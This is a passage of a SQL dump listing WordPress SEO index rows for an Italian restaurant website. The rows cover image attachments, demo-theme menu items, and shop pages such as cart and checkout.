19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2304,NULL,NULL,2781,'post','attachment',1,0,NULL,NULL,'landing-print-img-7','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-7.jpg',NULL,'2781','attachment-image',NULL,NULL,NULL,'2781','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:52','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2305,NULL,NULL,2613,'post','attachment',1,0,NULL,NULL,'h5-img-17a','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h5-img-17a.jpg',NULL,'2613','attachment-image',NULL,NULL,NULL,'2613','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2306,NULL,NULL,2734,'post','attachment',1,0,NULL,NULL,'landing-vector-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-4.png',NULL,'2734','attachment-image',NULL,NULL,NULL,'2734','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:54','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2307,NULL,NULL,2766,'post','attachment',1,0,NULL,NULL,'landing-img-8','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-8.jpg',NULL,'2766','attachment-image',NULL,NULL,NULL,'2766','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:55','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2308,NULL,NULL,2925,'post','attachment',1,0,NULL,NULL,'h2-rev-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/h2-rev-img-5-1.jpg',NULL,'2925','attachment-image',NULL,NULL,NULL,'2925','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:55','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2309,NULL,NULL,2782,'post','attachment',1,0,NULL,NULL,'landing-vector-img-13','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-13.png',NULL,'2782','attachment-image',NULL,NULL,NULL,'2782','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:55','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2310,NULL,NULL,2768,'post','attachment',1,0,NULL,NULL,'landing-vector-img-10','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-10.png',NULL,'2768','attachment-image',NULL,NULL,NULL,'2768','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:57','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2311,NULL,NULL,2620,'post','attachment',1,0,NULL,NULL,'landing-pop-up-bottom-sheet','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-pop-up-bottom-sheet.png',NULL,'2620','attachment-image',NULL,NULL,NULL,'2620','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2312,NULL,NULL,2946,'post','attachment',1,0,NULL,NULL,'landing-img-1','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-1-1.jpg',NULL,'2946','attachment-image',NULL,NULL,NULL,'2946','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:58','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2313,NULL,NULL,2735,'post','attachment',1,0,NULL,NULL,'landing-vector-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-5.png',NULL,'2735','attachment-image',NULL,NULL,NULL,'2735','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:59','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2314,NULL,NULL,2784,'post','attachment',1,0,NULL,NULL,'landing-print-img-8','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-8.jpg',NULL,'2784','attachment-image',NULL,NULL,NULL,'2784','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:55:59','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2315,NULL,NULL,2949,'post','attachment',1,0,NULL,NULL,'landing-img-5','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-5-1.jpg',NULL,'2949','attachment-image',NULL,NULL,NULL,'2949','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:00','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2316,NULL,NULL,2770,'post','attachment',1,0,NULL,NULL,'landing-vector-img-11','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-11.png',NULL,'2770','attachment-image',NULL,NULL,NULL,'2770','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2317,NULL,NULL,2948,'post','attachment',1,0,NULL,NULL,'landing-img-4','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-4-1.jpg',NULL,'2948','attachment-image',NULL,NULL,NULL,'2948','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2318,NULL,NULL,2785,'post','attachment',1,0,NULL,NULL,'landing-vector-img-14','inherit',0,0,0,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-14.png',NULL,'2785','attachment-image',NULL,NULL,NULL,'2785','attachment-image',NULL,0,NULL,NULL,'2021-01-23 17:56:02','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(697,NULL,NULL,2987,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(698,NULL,NULL,2988,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(699,NULL,NULL,2989,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(700,NULL,NULL,2990,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(701,NULL,NULL,2991,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(702,NULL,NULL,2992,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(703,NULL,NULL,2993,'post','custom_css',1,0,NULL,NULL,'attika','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(704,NULL,NULL,2994,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(705,NULL,NULL,2995,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:12','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(706,NULL,NULL,2996,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(707,NULL,NULL,2997,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(708,NULL,NULL,2998,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(709,NULL,NULL,2999,'post','nav_menu_item',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(710,NULL,NULL,3000,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(711,NULL,NULL,3001,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(712,NULL,NULL,3002,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(713,NULL,NULL,3003,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(714,NULL,NULL,3004,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(715,NULL,NULL,3005,'post','nav_menu_item',1,0,NULL,NULL,'Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(716,NULL,NULL,3006,'post','nav_menu_item',1,0,NULL,NULL,'Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(717,NULL,NULL,3007,'post','nav_menu_item',1,0,NULL,NULL,'Shop','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(718,NULL,NULL,3008,'post','nav_menu_item',1,0,NULL,NULL,'Blog','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(719,NULL,NULL,3009,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(720,NULL,NULL,3010,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(721,NULL,NULL,3011,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(722,NULL,NULL,3012,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(723,NULL,NULL,3013,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(724,NULL,NULL,3014,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(725,NULL,NULL,3015,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(726,NULL,NULL,3016,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(727,NULL,NULL,3017,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(728,NULL,NULL,3018,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(729,NULL,NULL,3019,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(730,NULL,NULL,3020,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(731,NULL,NULL,3021,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(732,NULL,NULL,3022,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(733,NULL,NULL,3023,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(734,NULL,NULL,3024,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(735,NULL,NULL,3025,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(736,NULL,NULL,3026,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(737,NULL,NULL,3027,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(738,NULL,NULL,3028,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(739,NULL,NULL,3029,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(740,NULL,NULL,3030,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:13','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(741,NULL,NULL,3031,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(742,NULL,NULL,3032,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(743,NULL,NULL,3033,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(744,'https://www.ristorantesolymar.it/vecchio/sample-page/','53:0e11e937e29624a209cb17b1abe7d60d',2,'post','page',1,0,NULL,NULL,'Sample Page','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-02-01 04:08:24',1,NULL,NULL,NULL,NULL,0,NULL),(745,NULL,NULL,3,'post','page',1,0,NULL,NULL,'Privacy Policy','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(746,'https://www.ristorantesolymar.it/vecchio/product-list/','54:6717642976f0ce79c646661a9da75b67',3034,'post','page',1,0,NULL,NULL,'Product List','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 22:07:05',1,NULL,NULL,NULL,NULL,0,NULL),(747,'https://www.ristorantesolymar.it/vecchio/cart/','46:590cc4e1f70c4f90c57ebe6bd83964a3',3035,'post','page',1,0,NULL,NULL,'Cart','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,4,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:54:23',1,NULL,NULL,NULL,NULL,0,NULL),(748,'https://www.ristorantesolymar.it/vecchio/my-account/','52:68e1d29de47b2d8488772bff204ecb24',3036,'post','page',1,0,NULL,NULL,'My Account','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,10,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:54:20',1,NULL,NULL,NULL,NULL,0,NULL),(749,'https://www.ristorantesolymar.it/vecchio/checkout-2/','52:506870f29d75346ee1a127361d85f07b',3037,'post','page',1,0,NULL,NULL,'Checkout','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:54:17',1,NULL,NULL,NULL,NULL,0,NULL),(750,'https://www.ristorantesolymar.it/vecchio/elements/headings/','59:4a2bfc61cfa400770ca3cd682f55ac58',3038,'post','page',1,0,NULL,NULL,'Headings','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:54:14',1,NULL,NULL,NULL,NULL,0,NULL),(751,'https://www.ristorantesolymar.it/vecchio/elements/','50:cee64467280cf7a3de70031dd16a6358',3039,'post','page',1,0,NULL,NULL,'Elements','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:52:07',1,NULL,NULL,NULL,NULL,0,NULL),(752,'https://www.ristorantesolymar.it/vecchio/','41:48cd926abfd2bd98ccfd264083a314b6',3040,'post','page',1,0,NULL,NULL,'Main Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,8,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 20:23:06',1,NULL,NULL,NULL,NULL,0,5),(753,'https://www.ristorantesolymar.it/vecchio/restaurant-home/','57:54f857e4053d2adaf6c5b7a7a2e766a8',3041,'post','page',1,0,NULL,NULL,'Restaurant Home','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2020-12-05 16:06:14','2021-01-31 21:52:00',1,NULL,NULL,NULL,NULL,0,NULL),(754,'https://www.ristorantesolymar.it/vecchio/seafood-restaurant/','60:dd8ae36d48736d22e353328d47cb9da7',3042,'post','page',1,0,NULL,NULL,'Seafood 